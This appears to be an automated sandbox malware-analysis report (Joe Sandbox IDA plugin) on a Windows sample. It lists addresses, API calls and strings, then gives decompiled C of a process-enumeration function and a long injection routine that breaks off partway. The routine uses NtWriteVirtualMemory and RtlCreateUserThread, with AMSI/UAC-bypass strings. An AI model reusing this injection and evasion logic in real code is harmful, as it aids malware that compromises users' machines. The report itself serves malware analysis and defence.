0x032bc02b
0x032bc036
0x032bc037
0x032bc03e
0x032bc041
0x032bc044
0x032bc054
0x032bc069
0x032bc069
0x032bac55
0x032bac65
0x032bac6a
0x032bac6f
0x032bac71
0x032bac81
0x032bac99
0x032baca4
0x032bacb2
0x032bacca
0x032bacd5
0x032bacd6
0x032bacdb
0x032bace0
0x032bace2
0x032bacf2
0x032bad0a
0x032bad15
0x032bad23
0x032bad3b
0x032bad46
0x032bad47
0x032bad4c
0x032bad51
0x032bad53
0x032bad63
0x032bad7b
0x032bad86
0x032bad94
0x032badac
0x032badb7
0x032badb8
0x032badc4
0x00000000
0x00000000
0x032badd1
0x032baddb
0x032badea
0x032baded
0x032badfd
0x032bbe43
0x032bbe4f
0x032bbe50
0x032bbe55
0x032bbe5b
0x032bbe5c
0x00000000
0x032bae0e
0x032bae17
0x032bae2a
0x00000000
0x032bae3f
0x032bae47
0x032bae4f
0x032bae58
0x032bae5e
0x032bae65
0x032bbe27
0x032bbe27
0x032bbe2c
0x032bbe31
0x032bbe32
0x032bbe37
0x032bbe3d
0x032bbe3e
0x00000000
0x032bbe3e
0x032bae72
0x032bae85
0x032bae8a
0x032bae8f
0x032bae91
0x032baea1
0x032baeb9
0x032baec4
0x032baed2
0x032baeea
0x032baef5
0x032baef6
0x032baefb
0x032baf00
0x032baf02
0x032baf12
0x032baf2a
0x032baf35
0x032baf43
0x032baf5b
0x032baf66
0x032baf67
0x032baf6c
0x032baf71
0x032baf73
0x032baf83
0x032baf9b
0x032bafa6
0x032bafb4
0x032bafcc
0x032bafd7
0x032bafd8
0x032bafdd
0x032bafe4
0x00000000
0x00000000
0x032baff1
0x032bb001
0x032bb006
0x032bb00b
0x032bb00d
0x032bb01d
0x032bb035
0x032bb040
0x032bb04e
0x032bb066
0x032bb071
0x032bb072
0x032bb077
0x032bb07c
0x032bb07e
0x032bb08e
0x032bb0a6
0x032bb0b1
0x032bb0bf
0x032bb0d7
0x032bb0e2
0x032bb0e3
0x032bb0e8
0x032bb0ed
0x032bb0ef
0x032bb0ff
0x032bb117
0x032bb122
0x032bb130
0x032bb148
0x032bb153
0x032bb154
0x032bb159
0x032bb160
0x032bbcbb
0x032bbcc0
0x032bbcc2
0x032bbcd2
0x032bbcea
0x032bbcf5
0x032bbd03
0x032bbd1b
0x032bbd26
0x032bbd27
0x032bbd2c
0x032bbd31
0x032bbd33
0x032bbd43
0x032bbd5b
0x032bbd66
0x032bbd74
0x032bbd8c
0x032bbd97
0x032bbd98
0x032bbd9d
0x032bbda2
0x032bbda4
0x032bbdb4
0x032bbdcc
0x032bbdd7
0x032bbde5
0x032bbdfd
0x032bbe08
0x032bbe09
0x032bbe0e
0x032bbe13
0x032bbe18
0x032bbe19
0x032bbe1e
0x032bbe21
0x032bbe22
0x00000000
0x032bbe22
0x032bb166
0x032bb16b
0x032bb16d
0x032bb17d
0x032bb195
0x032bb1a0
0x032bb1ae
0x032bb1c6
0x032bb1d1
0x032bb1d2
0x032bb1de
0x032bb1e3
0x032bb1eb
0x032bb1fd
0x032bb202
0x032bb20e
0x032bb212
0x032bb2ce
0x032bb2ce
0x032bb2d3
0x032bb2d5
0x032bb2e5
0x032bb2fd
0x032bb308
0x032bb316
0x032bb32e
0x032bb339
0x032bb33a
0x032bb342
0x032bb34a
0x032bb356
0x032bb35d
0x032bb364
0x032bb371
0x032bb371
0x032bb376
0x032bb37b
0x032bb37d
0x032bb38d
0x032bb3a5
0x032bb3b0
0x032bb3be
0x032bb3d6
0x032bb3e1
0x032bb3e2
0x032bb3e7
0x032bb3ec
0x032bb3ee
0x032bb3fe
0x032bb416
0x032bb421
0x032bb42f
0x032bb447
0x032bb452
0x032bb453
0x032bb458
0x032bb45d
0x032bb45f
0x032bb46f
0x032bb487
0x032bb492
0x032bb4a0
0x032bb4b8
0x032bb4c3
0x032bb4c4
0x032bb4d9
0x032bb4df
0x032bb4e4
0x032bb4e9
0x032bb4eb
0x032bb4fb
0x032bb513
0x032bb51e
0x032bb52c
0x032bb544
0x032bb54f
0x032bb550
0x032bb555
0x032bb55a
0x032bb55c
0x032bb56c
0x032bb584
0x032bb58f
0x032bb59d
0x032bb5b5
0x032bb5c0
0x032bb5c1
0x032bb5c6
0x032bb5cb
0x032bb5cd
0x032bb5dd
0x032bb5f5
0x032bb600
0x032bb60e
0x032bb626
0x032bb631
0x032bb632
0x032bb643
0x032bb648
0x032bb64d
0x032bb64f
0x032bb65f
0x032bb677
0x032bb682
0x032bb690
0x032bb6a8
0x032bb6b3
0x032bb6b4
0x032bb6b9
0x032bb6be
0x032bb6c0
0x032bb6d0
0x032bb6e8
0x032bb6f3
0x032bb701
0x032bb719
0x032bb724
0x032bb725
0x032bb72a
0x032bb72f
0x032bb731
0x032bb741
0x032bb759
0x032bb764
0x032bb772
0x032bb78a
0x032bb795
0x032bb796
0x032bb7ab
0x032bb7b0
0x032bb7b6
0x032bb7b8
0x032bb7bd
0x032bb7bf
0x032bb7cf
0x032bb7e7
0x032bb7f2
0x032bb800
0x032bb818
0x032bb823
0x032bb824
0x032bb829
0x032bb82e
0x032bb830
0x032bb840
0x032bb858
0x032bb863
0x032bb871
0x032bb889
0x032bb894
0x032bb895
0x032bb89a
0x032bb89f
0x032bb8a1
0x032bb8b1
0x032bb8c9
0x032bb8d4
0x032bb8e2
0x032bb8fa
0x032bb905
0x032bb906
0x032bb90b
0x032bb911
0x032bb917
0x032bb91d
0x032bb926
0x032bb92d
0x032bb92f
0x032bb934
0x032bb936
0x032bb946
0x032bb95e
0x032bb969
0x032bb977
0x032bb98f
0x032bb99a
0x032bb99b
0x032bb9b0
0x032bb9b5
0x032bb9bb
0x032bb9bf
0x032bb9c6
0x032bb9cb
0x032bb9d0
0x032bb9d2
0x032bb9e2
0x032bb9fa
0x032bba05
0x032bba13
0x032bba2b
0x032bba36
0x032bba37
0x032bba3c
0x032bba41
0x032bba43
0x032bba53
0x032bba6b
0x032bba76
0x032bba84
0x032bba9c
0x032bbaa7
0x032bbaa8
0x032bbaad
0x032bbab2
0x032bbab4
0x032bbac4
0x032bbadc
0x032bbae7
0x032bbaf5
0x032bbb0d
0x032bbb18
0x032bbb19
0x032bbb1e
0x032bbb23
0x032bbb25
0x032bbb35
0x032bbb4d
0x032bbb58
0x032bbb66
0x032bbb7e
0x032bbb89
0x032bbb8a
0x032bbb8f
0x032bbb94
0x032bbb96
0x032bbba6
0x032bbbbe
0x032bbbc9
0x032bbbd7
0x032bbbef
0x032bbbfa
0x032bbbfb
0x032bbc00
0x032bbc0d
0x032bbc20
0x032bbc27
0x032bbc29
0x032bbc2e
0x032bbc30
0x032bbc40
0x032bbc58
0x032bbc63
0x032bbc71
0x032bbc89
0x032bbc94
0x032bbc95
0x032bbc9a
0x032bbca1
0x032bbca7
0x032bbcab
0x032bbcb1
0x032bbcb1
0x00000000
0x032bbca1
0x032bb218
0x032bb218
0x032bb219
0x032bb21d
0x032bb21d
0x032bb225
0x032bb233
0x032bb241
0x032bb246
0x032bb24b
0x032bb24d
0x032bb25d
0x032bb275
0x032bb280
0x032bb28e
0x032bb2a6
0x032bb2b1
0x032bb2b2
0x032bb2b7
0x032bb2bf
0x032bb2c4
0x032bb2c4
0x032bb2c4
0x032bb2c4
0x00000000
0x032bb21d
0x032bae2a

APIs

Part of subcall function 032B7C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
Part of subcall function 032B7C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
Part of subcall function 032B7C04: GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
Part of subcall function 032B7C04: FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,032DE544,032BC094,UacInitialize,032DE544,032BC094,ScanString,032DE544,032BC094,UacInitialize,032DE544,032BC094,ScanString,032DE544), ref: 032BA9CE
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032BA9D4

Part of subcall function 032A2EE0: QueryPerformanceCounter.KERNEL32 ref: 032A2EE4

GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000062,00000000,00000000), ref: 032BAC5A

Part of subcall function 032B79BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032B79C9
Part of subcall function 032B79BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032B79CF

IsBadReadPtr.KERNEL32(00000000,00000040,?,?,00000062,00000000,00000000), ref: 032BADF6
IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 032BAE23
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 032BAE7A
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,032DE544,032BC094,UacInitialize,032DE544,032BC094,ScanString,032DE544,032BC094,ScanBuffer,032DE544,032BC094,OpenSession,032DE544), ref: 032BB7A5
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032BB7AB
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,032DE544,032BC094,?,?,00000062,00000000,00000000), ref: 032BB9AA
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032BB9B0
CloseHandle.KERNEL32(00000000,ScanBuffer,032DE544,032BC094,?,?,00000062,00000000,00000000), ref: 032BBCB1
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,032DE544,032BC094,ScanString,032DE544,032BC094,UacInitialize,032DE544,032BC094,OpenSession,032DE544,032BC094), ref: 032BBE22
GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 032BBE38
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 032BBE3E
GetCurrentProcess.KERNEL32(00000000,00000000,?,?,00000062,00000000,00000000), ref: 032BBE56
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,00000062,00000000,00000000), ref: 032BBE5C

Strings

ntdll, xrefs: 032BBE99, 032BBEAA, 032BBECC, 032BBEDD
bcrypt, xrefs: 032BBE66, 032BBE77, 032BBE88
UacScan, xrefs: 032BB2D5
BCryptQueryProviderRegistration, xrefs: 032BBE72
I_QueryTagInformation, xrefs: 032BBEB6
NtWriteVirtualMemory, xrefs: 032BB79B
BCryptVerifySignature, xrefs: 032BBE61
NtOpenProcess, xrefs: 032BA9C4, 032BBED8
NtSetSecurityObject, xrefs: 032BBEC7
ScanString, xrefs: 032BA7E4, 032BA89A, 032BAA68, 032BABD6, 032BB64F, 032BBA43, 032BBD33, 032BBF61
ScanBuffer, xrefs: 032BA94C, 032BAC71, 032BAE91, 032BB00D, 032BB16D, 032BB24D, 032BB45F, 032BB5CD, 032BB731, 032BB8A1, 032BB936, 032BBB96, 032BBC30
UacInitialize, xrefs: 032BA841, 032BA8F3, 032BACE2, 032BAF02, 032BB07E, 032BB37D, 032BB4EB, 032BB6C0, 032BB7BF, 032BB9D2, 032BBB25, 032BBCC2, 032BBEF0
C:\Windows\System32\ntdll.dll, xrefs: 032BA9C9, 032BB7A0, 032BB9A5
RtlCreateUserThread, xrefs: 032BB9A0
OpenSession, xrefs: 032BA732, 032BAAF4, 032BAD53, 032BAF73, 032BB0EF, 032BB3EE, 032BB55C, 032BB830, 032BBAB4, 032BBDA4, 032BBFD2
BCryptRegisterProvider, xrefs: 032BBE83
NtOpenObjectAuditAlarm, xrefs: 032BBEA5
Initialize, xrefs: 032BA78B, 032BA9FD, 032BAB65
advapi32, xrefs: 032BBEBB
NtReadVirtualMemory, xrefs: 032BBE94

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Handle$AddressModuleProc$CurrentFreeProcess$MemoryVirtual$LibraryRead$CloseCounterLoadPerformanceQuery
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 1521529492-530569836
Opcode ID: a04c6a64176a3148a7a5d788537e8f14deb26322a424261cab8713ebee0dea81
Instruction ID: c6dea79538bf45dff07c60967c19bbc8f3ddbd0ff256407b7d3612f8edb41435
Opcode Fuzzy Hash: a04c6a64176a3148a7a5d788537e8f14deb26322a424261cab8713ebee0dea81
Instruction Fuzzy Hash: C1D20D38A206699FCB15FBA9DC80BDEB3B9AF45740F1085A1A504AF314DAF0DEC58F51

Uniqueness

Uniqueness Score: -1.00%

Function 032BA0C8 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032BA0C8() {

				if( *0x32de4c8 == 0) {
					 *0x32de4c8 = GetModuleHandleA("kernel32.dll");
					if( *0x32de4c8 != 0) {
						 *0x32de4cc = GetProcAddress( *0x32de4c8, "CreateToolhelp32Snapshot");
						 *0x32de4d0 = GetProcAddress( *0x32de4c8, "Heap32ListFirst");
						 *0x32de4d4 = GetProcAddress( *0x32de4c8, "Heap32ListNext");
						 *0x32de4d8 = GetProcAddress( *0x32de4c8, "Heap32First");
						 *0x32de4dc = GetProcAddress( *0x32de4c8, "Heap32Next");
						 *0x32de4e0 = GetProcAddress( *0x32de4c8, "Toolhelp32ReadProcessMemory");
						 *0x32de4e4 = GetProcAddress( *0x32de4c8, "Process32First");
						 *0x32de4e8 = GetProcAddress( *0x32de4c8, "Process32Next");
						 *0x32de4ec = GetProcAddress( *0x32de4c8, "Process32FirstW");
						 *0x32de4f0 = GetProcAddress( *0x32de4c8, "Process32NextW");
						 *0x32de4f4 = GetProcAddress( *0x32de4c8, "Thread32First");
						 *0x32de4f8 = GetProcAddress( *0x32de4c8, "Thread32Next");
						 *0x32de4fc = GetProcAddress( *0x32de4c8, "Module32First");
						 *0x32de500 = GetProcAddress( *0x32de4c8, "Module32Next");
						 *0x32de504 = GetProcAddress( *0x32de4c8, "Module32FirstW");
						 *0x32de508 = GetProcAddress( *0x32de4c8, "Module32NextW");
					}
				}
				if( *0x32de4c8 == 0 ||  *0x32de4cc == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x032ba0d1
0x032ba0e1
0x032ba0e6
0x032ba0f9
0x032ba10b
0x032ba11d
0x032ba12f
0x032ba141
0x032ba153
0x032ba165
0x032ba177
0x032ba189
0x032ba19b
0x032ba1ad
0x032ba1bf
0x032ba1d1
0x032ba1e3
0x032ba1f5
0x032ba207
0x032ba207
0x032ba0e6
0x032ba20f
0x032ba21d
0x032ba21e
0x032ba221
0x032ba221

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,032BA34F,?,?,032BA3E1,00000000,032BA4BD), ref: 032BA0DC
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 032BA0F4
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 032BA106
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 032BA118
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 032BA12A
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 032BA13C
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 032BA14E
GetProcAddress.KERNEL32(00000000,Process32First), ref: 032BA160
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 032BA172
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 032BA184
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 032BA196
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 032BA1A8
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 032BA1BA
GetProcAddress.KERNEL32(00000000,Module32First), ref: 032BA1CC
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 032BA1DE
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 032BA1F0
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 032BA202

Strings

Module32Next, xrefs: 032BA1D6
Process32FirstW, xrefs: 032BA17C
Process32First, xrefs: 032BA158
Module32FirstW, xrefs: 032BA1E8
Process32NextW, xrefs: 032BA18E
Toolhelp32ReadProcessMemory, xrefs: 032BA146
Thread32First, xrefs: 032BA1A0
CreateToolhelp32Snapshot, xrefs: 032BA0EC
Heap32First, xrefs: 032BA122
kernel32.dll, xrefs: 032BA0D7
Heap32Next, xrefs: 032BA134
Heap32ListNext, xrefs: 032BA110
Module32First, xrefs: 032BA1C4
Thread32Next, xrefs: 032BA1B2
Module32NextW, xrefs: 032BA1FA
Process32Next, xrefs: 032BA16A
Heap32ListFirst, xrefs: 032BA0FE

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 5c4d9c66a26368d07435876e0c3f3918e1f1a9819b74dc8209cef984b05093ed
Instruction ID: ed2bb705b48c5fdf4b6f62da6a81293266c78f92e9d218145fe42a2dfa058de2
Opcode Fuzzy Hash: 5c4d9c66a26368d07435876e0c3f3918e1f1a9819b74dc8209cef984b05093ed
Instruction Fuzzy Hash: 253100B49627109FDF04FFB8E889E5D37B8AB06F40B494665B450DF609D3B998D0CB21

Uniqueness

Uniqueness Score: -1.00%

Function 032B7F54 Relevance: 43.9, APIs: 8, Strings: 16, Instructions: 1882
nativethreadprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E032B7F54(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				char _v92;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				char _v152;
				char _v156;
				void* _v160;
				void* _v164;
				void* _v168;
				void* _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				char _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				char _v408;
				char _v412;
				char _v416;
				intOrPtr _v420;
				char _v424;
				char _v428;
				char _v432;
				intOrPtr _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				char _v464;
				intOrPtr _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				char _v504;
				char _v508;
				char _v512;
				intOrPtr _v516;
				char _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				char _v552;
				char _v556;
				char _v560;
				intOrPtr _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				intOrPtr _v628;
				char _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				char _v792;
				char _v796;
				char _v800;
				intOrPtr _v804;
				char _v808;
				char _v812;
				char _v816;
				intOrPtr _v820;
				char _v824;
				char _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				char _v844;
				char _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				intOrPtr _v868;
				char _v872;
				char _v876;
				char _v880;
				intOrPtr _v884;
				char _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				char _v904;
				char _v908;
				char _v912;
				intOrPtr _v916;
				char _v920;
				char _v924;
				char _v928;
				intOrPtr _v932;
				char _v936;
				char _v940;
				char _v944;
				intOrPtr _v948;
				char _v952;
				char _v956;
				char _v960;
				intOrPtr _v964;
				char _v968;
				char _v972;
				char _v976;
				intOrPtr _v980;
				char _v984;
				char _v988;
				char _v992;
				intOrPtr _v996;
				char _v1000;
				char _v1004;
				char _v1008;
				intOrPtr _v1012;
				char _v1016;
				char _v1020;
				char _v1024;
				intOrPtr _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				char _v1048;
				char _v1052;
				short* _t604;
				intOrPtr _t617;
				intOrPtr* _t620;
				intOrPtr _t734;
				void* _t819;
				int _t820;
				intOrPtr _t877;
				void* _t879;
				intOrPtr _t881;
				long _t883;
				intOrPtr _t884;
				void* _t886;
				intOrPtr _t946;
				long _t962;
				void* _t963;
				void* _t964;
				intOrPtr _t1036;
				void* _t1038;
				intOrPtr _t1110;
				intOrPtr _t1112;
				void* _t1169;
				void* _t1199;
				void* _t1288;
				void* _t1290;
				void* _t1292;
				void* _t1294;
				void* _t1296;
				void* _t1298;
				void* _t1300;
				intOrPtr _t1386;
				intOrPtr _t1387;
				intOrPtr _t1389;
				intOrPtr _t1433;
				intOrPtr _t1535;
				void* _t1537;
				long _t1539;
				void* _t1540;
				long _t1542;
				void* _t1543;
				void* _t1561;
				void* _t1645;
				void* _t1650;
				void* _t1655;
				void* _t1660;
				intOrPtr _t1661;
				void* _t1699;
				void* _t1704;
				signed int _t1705;
				void* _t1711;
				void* _t1716;
				void* _t1721;
				void* _t1726;
				void* _t1731;
				void* _t1736;
				void* _t1741;
				void* _t1746;
				void* _t1751;
				void* _t1756;
				void* _t1761;
				void* _t1766;
				void* _t1771;
				void* _t1776;
				void* _t1781;
				void* _t1786;
				void* _t1791;
				void* _t1796;
				void* _t1801;
				void* _t1806;
				void* _t1811;
				void* _t1816;
				void* _t1821;
				void* _t1826;
				void* _t1831;
				void* _t1836;
				void* _t1841;
				void* _t1846;
				void* _t1851;
				void* _t1856;
				void* _t1861;
				void* _t1866;
				void* _t1871;
				void* _t1877;
				void* _t1882;
				void* _t1887;
				void* _t1892;
				void* _t1904;
				void* _t1909;
				void* _t1914;
				void* _t1919;
				void* _t1924;
				void* _t1929;
				void _t1930;
				void _t1932;
				void* _t1937;
				void* _t1942;
				void* _t1947;
				intOrPtr _t1949;
				void* _t1954;
				void* _t1959;
				void* _t1964;
				void* _t1969;
				void* _t1974;
				void* _t1979;
				void* _t1984;
				intOrPtr _t1994;
				void* _t1995;
				intOrPtr _t1997;
				intOrPtr _t1998;
				void* _t2006;
				void* _t2009;
				void* _t2013;

				_t2013 = __fp0;
				_t1997 = _t1998;
				_t1561 = 0x83;
				do {
					_push(0);
					_push(0);
					_t1561 = _t1561 - 1;
					_t2001 = _t1561;
				} while (_t1561 != 0);
				_t1994 = __edx;
				_v8 = __eax;
				E032A4954(_v8);
				_push(_t1997);
				_push(0x32b9f25);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1998;
				E032A44F4(0x32de35c, 0x32b9f40);
				_push(0x32b9f4c);
				_push( *0x32de35c);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v12, E032A4964(_v16));
				_push(_v12);
				E032A47B0( &_v24,  *0x32de35c, 0x32b9f4c);
				E032A4698( &_v20, E032A4964(_v24));
				_pop(_t1645);
				E032B7C04(_v20,  *0x32de35c, _t1645, _t2001);
				_push(0x32b9f4c);
				_push( *0x32de35c);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v28, E032A4964(_v32));
				_push(_v28);
				E032A47B0( &_v40,  *0x32de35c, 0x32b9f4c);
				E032A4698( &_v36, E032A4964(_v40));
				_pop(_t1650);
				E032B7C04(_v36,  *0x32de35c, _t1650, _t2001);
				_push(0x32b9f4c);
				_push( *0x32de35c);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v44, E032A4964(_v48));
				_push(_v44);
				E032A47B0( &_v56,  *0x32de35c, 0x32b9f4c);
				E032A4698( &_v52, E032A4964(_v56));
				_pop(_t1655);
				E032B7C04(_v52,  *0x32de35c, _t1655, _t2001);
				_push(0x32b9f4c);
				_push( *0x32de35c);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v60, E032A4964(_v64));
				_push(_v60);
				E032A47B0( &_v72,  *0x32de35c, 0x32b9f4c);
				E032A4698( &_v68, E032A4964(_v72));
				_pop(_t1660);
				E032B7C04(_v68,  *0x32de35c, _t1660, _t2001);
				 *0x32de4a4 = _t1994;
				_t604 =  *0x32de4a4; // 0x0
				if( *_t604 == 0x5a4d) {
					_push(0);
					_push(_t1994);
					_t617 =  *0x32de4a4; // 0x0
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					 *0x32de4a8 =  *((intOrPtr*)(_t617 + 0x3c)) + _v92;
					_t620 =  *0x32de4a8; // 0x0
					if( *_t620 == 0x4550) {
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("UacInitialize");
						E032A4824();
						E032A4698( &_v176, E032A4964(_v180));
						_push(_v176);
						E032A47B0( &_v188,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v184, E032A4964(_v188));
						_pop(_t1699);
						E032B7C04(_v184,  *0x32de35c, _t1699, _t2004);
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v192, E032A4964(_v196));
						_push(_v192);
						E032A47B0( &_v204,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v200, E032A4964(_v204));
						_pop(_t1704);
						E032B7C04(_v200,  *0x32de35c, _t1704, _t2004);
						E032A2EE0();
						 *0x32de4c4 = (E032A2F08(9) + 1) * 0x5f5e100;
						_t734 =  *0x32de4a8; // 0x0
						_t1705 =  *0x32de4c4; // 0x0
						 *0x32de4c0 = _t1705 -  *((intOrPtr*)(_t734 + 0x50));
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("UacInitialize");
						E032A4824();
						E032A4698( &_v208, E032A4964(_v212));
						_push(_v208);
						E032A47B0( &_v220,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v216, E032A4964(_v220));
						_pop(_t1711);
						E032B7C04(_v216,  *0x32de35c, _t1711, _t2004);
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("ScanString");
						E032A4824();
						E032A4698( &_v224, E032A4964(_v228));
						_push(_v224);
						E032A47B0( &_v236,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v232, E032A4964(_v236));
						_pop(_t1716);
